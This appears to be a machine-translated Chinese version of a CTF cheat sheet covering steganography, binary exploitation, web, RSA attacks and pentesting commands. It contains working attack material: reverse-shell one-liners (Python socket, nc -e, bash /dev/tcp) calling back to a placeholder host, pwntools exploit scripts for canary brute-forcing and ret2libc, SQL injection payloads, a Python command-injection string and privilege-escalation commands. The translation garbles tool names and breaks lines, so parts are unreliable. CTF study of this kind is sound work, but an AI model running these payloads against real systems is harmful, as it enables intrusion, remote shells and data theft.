我完成的一些網絡 CTF 的文章/文件
我還提供了CTF 資源清單以及涵蓋大量常見 CTF 挑戰的綜合備忘單
筆記
現在該儲存庫的網路鏡像位於 hackback.zip
資源
CTF 備忘錄
網路廚師
常用密碼
RSA
基數 16、32、36、58、64、85、91、92
以下是我整理的一些投影片:hackback.zip/presentations
20{19,20,21,22,23,24}.cr.yp.toc.tf
。file <file.xyz>
steghide extract -sf <file.xyz>
stegseek <file> <password list>
binwalk -M --dd=".*" <file.xyz>
exiftool <file.xyz>
strings <file.xyz>
hexedit <file.xyz>
ghex <file.xyz>
unzip <file.docx>
grep -r --text 'picoCTF{.*}'
egrep -r --text 'picoCTF{.*?}
ltrace ./<file>
ltrace -s 100 ./<file>
傳真機音訊:
SSTV(慢掃描電視)音訊(月亮的東西)
頻譜圖影像
改變音調、速度、方向...
DTMF(雙音多頻)電話鍵
multimon-ng -a DTMF -t wav <file.wav>
磁帶
摩斯電碼
史蒂格求解
最重要的
德皮克斯
檢查是否有某些內容經過 Photoshop 處理(請參閱亮點)
茲泰格
傑斯特格
像素恢復
crc32修復
聚合酶鍊式反應
png-crc-修復
PNG檢查
photorec <file.bin>
.img
檔:binwalk -M --dd=".*" <fileName>
file
並選擇 Linux 檔案系統文件losetup /dev/loop<freeLoopNumber> <fileSystemFile>
tcpflow -r <file.pcap>
checksec <binary>
rabin2 -I <binary>
binary-security-check <bin>.exe
seccomp-tools dump ./<binary>
readelf -s <binary>
rabin2 -z <binary>
python -c "import pwn; print(pwn.p32(<intAddr>))
python -c "import pwn; print(pwn.p64(<intAddr>))
( python -c "print '<PAYLOAD>'" ; cat ) | ./<program>
process.interactive()
來做到這一點pwn cyclic <numChars>
產生有效負載dmesg | tail | grep segfault
查看錯誤所在pwn cyclic -l 0x<errorLocation>
查看控制指令指標的隨機偏移量ROPgadget --ropchain --binary <binary>
在調試器中尋找堆疊金絲雀
gs
或fs
(分別適用於 32 位元和 64 位元) 0x000000000000121a <+4>: sub rsp,0x30
0x000000000000121e <+8>: mov rax,QWORD PTR fs:0x28
0x0000000000001227 <+17>:mov QWORD PTR [rbp-0x8],rax
0x000000000000122b <+21>:xor eax,eax
rax
偏移量 +8 處。ir rax
) 中的內容以查看當前的金絲雀是什麼靜態金絲雀
額外的
當堆疊金絲雀被不正確地覆蓋時,將導致對__stack_chk_fail
的調用
金絲雀儲存在目前堆疊的TLS
結構中,並由security_init
初始化
暴力破解靜態 4 位元組金絲雀的簡單腳本:
#!/bin/python3
from pwn import *
#This program is the buffer_overflow_3 in picoCTF 2018
elf = ELF ( './vuln' )
# Note that it's probably better to use the chr() function too to get special characters and other symbols and letters.
# But this canary was pretty simple :)
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
canary = ''
# Here we are bruteforcing a canary 4 bytes long
for i in range ( 1 , 5 ):
for letter in range ( 0 , len ( alphabet )): # We will go through each letter/number in the string 'alphabet'
p = elf . process () # We start the process
wait = p . recv (). decode ( 'utf-8' )
p . sendline ( str ( 32 + i )) # In this program, we had to specify how many bytes we were gonna send.
wait = p . recv (). decode ( 'utf-8' )
p . sendline ( 'A' * 32 + canary + alphabet [ letter ]) # We send the 32 A's to overflow, and then the canary we already have + our guess
prompt = p . recv (). decode ( 'utf-8' )
if "Stack" not in prompt : # The program prints "Stack smashed [...]" if we get wrongfully write the canary.
canary += alphabet [ letter ] # If it doesn't print that, we got part of our canary :)
break # Move on to the next canary letter/number
print ( "The canary is: " + canary )
%1$s
- 這會將堆疊中的第一個值(據我所知,緩衝區旁邊的值)列印為字串。%2$s
- 這會將第二個值列印為字串,您明白了for i in {1..100}; do echo "%$i$s" | nc [b7dca240cf1fbf61.247ctf.com](http://b7dca240cf1fbf61.247ctf.com/) 50478; done
%hhx
洩漏 1 個位元組(int 大小的一半)%hx
洩漏 2 個位元組(int 大小的一半)%x
洩漏 4 個位元組(int 大小)%lx
洩漏 8 個位元組(長尺寸)我們將覆寫 EIP 來呼叫 system() 函式庫函數,我們也將傳遞它應該執行的內容,在本例中是一個帶有「/bin/sh」的緩衝區
很好的解釋:
很好的例子(轉 3:22:44):
取得 execve("/bin/sh") 的位址
one_gadget <libc file>
如果您已經知道 libc 檔案和位置(即不必洩漏它們...)
#!/bin/python3
from pwn import *
import os
binaryName = 'ret2libc1'
# get the address of libc file with ldd
libc_loc = os . popen ( f'ldd { binaryName } ' ). read (). split ( ' n ' )[ 1 ]. strip (). split ()[ 2 ]
# use one_gadget to see where execve is in that libc file
one_gadget_libc_execve_out = [ int ( i . split ()[ 0 ], 16 ) for i in os . popen ( f'one_gadget { libc_loc } ' ). read (). split ( " n " ) if "execve" in i ]
# pick one of the suitable addresses
libc_execve_address = one_gadget_libc_execve_out [ 1 ]
p = process ( f'./ { binaryName } ' )
e = ELF ( f'./ { binaryName } ' )
l = ELF ( libc_loc )
# get the address of printf from the binary output
printf_loc = int ( p . recvuntil ( ' n ' ). rstrip (), 16 )
# get the address of printf from libc
printf_libc = l . sym [ 'printf' ]
# calculate the base address of libc
libc_base_address = printf_loc - printf_libc
# generate payload
# 0x17 is from gdb analysis of offset from input to return address
offset = 0x17
payload = b"A" * offset
payload += p64 ( libc_base_address + libc_execve_address )
# send the payload
p . sendline ( payload )
# enter in interactive so we can use the shell created from our execve payload
p . interactive ()
酷指南:https://opensource.com/article/20/4/linux-binary-analysis
apktool d *.apk
strings
。使用靜態分析來尋找和計算字串https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html
#!/bin/python3
from pwn import *
import string
keyLen = 8
binaryName = 'binary'
context . log_level = 'error'
s = ''
print ( "*" * keyLen )
for chars in range ( keyLen ):
a = []
for i in string . printable :
p = process ( f'perf stat -x, -e cpu-clock ./ { binaryName } ' . split ())
p . readline ()
currPass = s + i + '0' * ( keyLen - chars - 1 )
# print(currPass)
p . sendline ( currPass . encode ())
p . readline ()
p . readline ()
p . readline ()
info = p . readall (). split ( b',' )[ 0 ]
p . close ()
try :
a . append (( float ( info ), i ))
except :
pass
# print(float(info), i)
a . sort ( key = lambda x : x [ 0 ])
s += str ( a [ - 1 ][ 1 ])
print ( s + "*" * ( keyLen - len ( s )))
# print(sorted(a, key = lambda x: x[0]))
p = process ( f'./ { binaryName } ' )
p . sendline ( s . encode ())
p . interactive ()
grep <string>
,gef 將自動顯示與您的搜尋模式相符的字串wpscan --url <site> --plugins-detection mixed -e
與 api 密鑰以獲得最佳結果echo <token> > jwt.txt
john jwt.txt
sqlmap --forms --dump-all -u <url>
'OR 1=1--
SELECT * FROM Users WHERE User = '' OR 1=1--' AND Pass = ''
1=1
計算結果為 true,滿足OR
語句,查詢的其餘部分由--
註解掉__import__.('subprocess').getoutput('<command>')
__import__.('subprocess').getoutput('ls').split('\n')
ffuf -request input.req -request-proto http -w /usr/share/seclists/Fuzzing/special-chars.txt -mc all
-fs
過濾大小密碼檢測器
#### Solver using custom table
cipherText = ""
plainText = ""
flagCipherText = ""
tableFile = ""
with open ( cipherText ) as fin :
cipher = fin . readline (). rstrip ()
with open ( plainText ) as fin :
plain = fin . readline (). rstrip ()
with open ( flagCipherText ) as fin :
flag = fin . readline (). rstrip ()
with open ( tableFile ) as fin :
table = [ i . rstrip (). split () for i in fin . readlines ()]
table [ 0 ]. insert ( 0 , "" ) # might have to modify this part.
# just a 2d array with the lookup table
# should still work if the table is slightly off, but the key will be wrong
key = ""
for i , c in enumerate ( plain [ 0 : 100 ]):
col = table [ 0 ]. index ( c )
for row in range ( len ( table )):
if table [ row ][ col ] == cipher [ i ]:
key += table [ row ][ 0 ]
break
print ( key )
dec_flag = ""
for i , c in enumerate ( flag [: - 1 ]):
col = table [ 0 ]. index ( key [ i ])
for row in range ( len ( table )):
if table [ row ][ col ] == flag [ i ]:
dec_flag += table [ row ][ 0 ]
break
print ( dec_flag )
from Crypto . PublicKey import RSA
keyName = "example.pem"
with open ( keyName , 'r' ) as f :
key = RSA . import_key ( f . read ())
print ( key )
# You can also get individual parts of the RSA key
# (sometimes not all of these)
print ( key . p )
print ( key . q )
print ( key . n )
print ( key . e )
print ( key . d )
print ( key . u )
# public keys have n and e
當您可以因式分解數字n
時使用此選項
老的
def egcd ( a , b ):
if a == 0 :
return ( b , 0 , 1 )
g , y , x = egcd ( b % a , a )
return ( g , x - ( b // a ) * y , y )
def modinv ( a , m ):
g , x , y = egcd ( a , m )
if g != 1 :
raise Exception ( 'No modular inverse' )
return x % m
p =
q =
e =
c =
n = p * q # use factordb command or website to find factors
phi = ( p - 1 ) * ( q - 1 ) # phi is simply the product of (factor_1-1) * ... * (factor_n -1)
d = modinv ( e , phi ) # private key
# print(d)
m = pow ( c , d , n ) # decrypted plaintext message in long integer form
thing = hex ( m )[ 2 :] # ascii without extra stuff at the start (0x)
print ( bytes . fromhex ( thing ). decode ( 'ascii' ))
#!/bin/python3
from Crypto . Util . number import *
from factordb . factordb import FactorDB
# ints:
n =
e =
c =
f = FactorDB ( n )
f . connect ()
factors = f . get_factor_list ()
phi = 1
for i in factors :
phi *= ( i - 1 )
d = inverse ( e , phi )
m = pow ( c , d , n )
flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )
from Crypto . Util . number import *
def nth_root ( radicand , index ):
lo = 1
hi = radicand
while hi - lo > 1 :
mid = ( lo + hi ) // 2
if mid ** index > radicand :
hi = mid
else :
lo = mid
if lo ** index == radicand :
return lo
elif hi ** index == radicand :
return hi
else :
return - 1
c =
e =
plaintext = long_to_bytes ( nth_root ( c , e ))
print ( plaintext . decode ( "UTF-8" ))
p-1 | B!
就是這種情況。 p-1 | B!
且q - 1
因子 > B
from Crypto . Util . number import *
from math import gcd
n =
c =
e =
def pollard ( n ):
a = 2
b = 2
while True :
a = pow ( a , b , n )
d = gcd ( a - 1 , n )
if 1 < d < n :
return d
b += 1
p = pollard ( n )
q = n // p
phi = 1
for i in [ p , q ]:
phi *= ( i - 1 )
d = inverse ( e , phi )
m = pow ( c , d , n )
flag = long_to_bytes ( m ). decode ( 'UTF-8' )
print ( flag )
from Crypto . Util . number import *
import owiener
n =
e =
c =
d = owiener . attack ( e , n )
m = pow ( c , d , n )
flag = long_to_bytes ( m )
print ( flag )
https://github.com/mufeedvh/basecrack
ssh <username>@<ip>
ssh <username>@<ip> -i <private key file>
sshfs -p <port> <user>@<ip>: <mount_directory>
ssh-copy-id -i ~/.ssh/id_rsa.pub <user@host>
nc <ip> <port>
機器發現
netdiscover
機器連接埠掃描
nmap -sC -sV <ip>
Linux枚舉
enum4linux <ip>
中小企業枚舉
smbmap -H <ip>
連接到 SMB 共享
smbclient //<ip>/<share>
./linpeas.sh
sudo -l
find / -perm -u=s -type f 2>/dev/null
accesschk.exe -uwcqv *
sc qc <service name>
nc -lnvp <port>
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -e /bin/sh <ip> <port>
bash -i >& /dev/tcp/<ip>/<port> 0>&1
python -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
退出 netcat 會話並在本地運行stty raw -echo
fg
重新輸入會話(如果需要,可在後面輸入作業 ID)export TERM=xterm
將終端模擬器變更為 xterm(這可能不是必需的)export SHELL=bash
將 shell 更改為 bash (這可能不是必需的)rlwrap
rlwrap
放在前面rlwrap nc -lvnp 1337
解決 DNS 錯誤
dig <site> <recordType>
作為不同的架構運行二進位文件
linux64 ./<binary>
linux32 ./<binary>
提取 MS 巨集:
查看 CNC G 代碼